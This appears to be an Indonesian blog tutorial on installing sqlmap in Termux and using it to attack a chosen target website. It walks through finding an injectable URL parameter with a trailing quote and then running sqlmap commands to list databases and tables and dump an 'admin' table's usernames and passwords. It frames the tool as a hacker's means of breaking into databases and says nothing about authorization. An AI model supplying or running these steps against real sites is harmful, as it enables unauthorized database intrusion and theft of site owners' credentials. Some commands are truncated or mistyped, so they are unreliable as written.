/* Header Mobile Redesign by Simeyong.com */ @media only screen and (max-width:480px){#header,#header .widget .blog-title-wrap{margin:0px}#header,#social-button{max-width:50%}#header .widget p.title-description{margin-top:0px}#header,#social-button{text-align:right}#header-outer #header-content{padding:3px 20px}#social-button .social-icon{margin:3px 0;padding:3px}}@media only screen and (max-width:350px){#header .widget .blog-title-wrap{margin:0 auto}#header{max-width:100%;margin-bottom:10px}#header .widget p.title-descriptio{margin-top:8px}#header,#social-button{text-align:center}#header-outer #header-content{padding:22px 22px 12px}}

Widget HTML Atas

Cara Install SQLMap dan cara menggunakan SQLMap di Termux

Sqlmap merupakan tool yang sangat polpuler dikalangan hacker, dengan kemampuannya menjebol database tak heran jika aplikasi ini sangat sering di pakai. Penyerangan menggunakan salmap ini merupakan jenis penyerangan SQL Injection kalo kamu belum paham apa itu SQL Injection silahkan baca postingan sebelumnya yang berujudul Penjelasan Lengkap SQL Map

Cara Install Sqlmap di termux 

Nah langsung aja ke tutorial penginstalannya:

Buka aplikasi 

Termux Update package termux
Caranya dengan mengetikkan perintah "pkg update && pkg upgrade

Install git

jika kamu sebelumnya sudah menginstall git lewati langkah ini, untuk menginstall git cukup ketikkan "pkg install git"

Install python

Karena sqlmap ini berjalan di bawah bahasa pemrograman python, kita harus menginstall python dulu. Install python dengan cara mengetikkan "pkg install python"

Copy script sqlmap ke termux 

Caranya dengan mengetikkan "git clone https://github.com/sqlmapproject/sqlmap

Masuk folder sqlmap

Caranya dengan mengetikkan "cd sqlmapnanti akan terlihat folder apa saja yang ada di termux kam

Jalankan script sqlmap

Caranya  dengan mengetikkan "python sqlmap.py" dan script sqlmap siap digunakan

Cara menggunakan sqlmap

Temukan celah website dahulu 

Jika kamu sudah mendapatkan target situs untuk di eksekusi anggaplah url yg vuln itu web.com/pro.php?id=2 Untuk memastikan sebuah url web bisa atau tidaknya di inject, cukup ketikkan ' di belakang karakter url saya contohkan web.com/pro.php?id=2' lalu tekan enter, jika web tersebut bisa di inject maka akan tampil blank atau ada tampilan error, seperti gambar di bawah ini

Eksekusi script sqlmap

Setelah itu ketikkan 'python sqlmap.py "web.com/cat.php?id=2" --dbs' jika ada pilihan Y(yes) or N(no) tekan aja Y dan kamu akan melihat tampilan seperti di bawah ini Nah yang di lingkari itu adalah daftar database yang ada di web tersebut 
Pilih database di server
Tujuannya untuk melihat isi tabelnya dengan mengetikkan python sqlmap.py -u "https://web.com/cat.php?cat=1" --tables -D

gambar di atas adalah isi dari dari database yang kita pilih tadi.

Pilih tabel yang ingin kita lihat isinya 

dalam kasus ini kita akan melihat isi tabel admin dengan mengetikkan python sqlmap.py -u "https://web.com/cat.php?cat=1" --columns -D ic38_ic38test -T admin

gambar di atas adalah isi dari tabel yang kita pilih tadi yakni tabel admin

Kita pilih lagi tabel yang ingin kita lihat isinya lebih detail

Caranya dengan mengetikkan python sqlmap.py -u "https://web.com/cat.php?cat=1" --dump -D ic38_ic38test -T admin

nah gambar di atas adalah data yang kita dapat berupa user dan password web..

Sekian yah semoga bekerja dengan baik... Capek nulis...

Tidak ada komentar untuk "Cara Install SQLMap dan cara menggunakan SQLMap di Termux"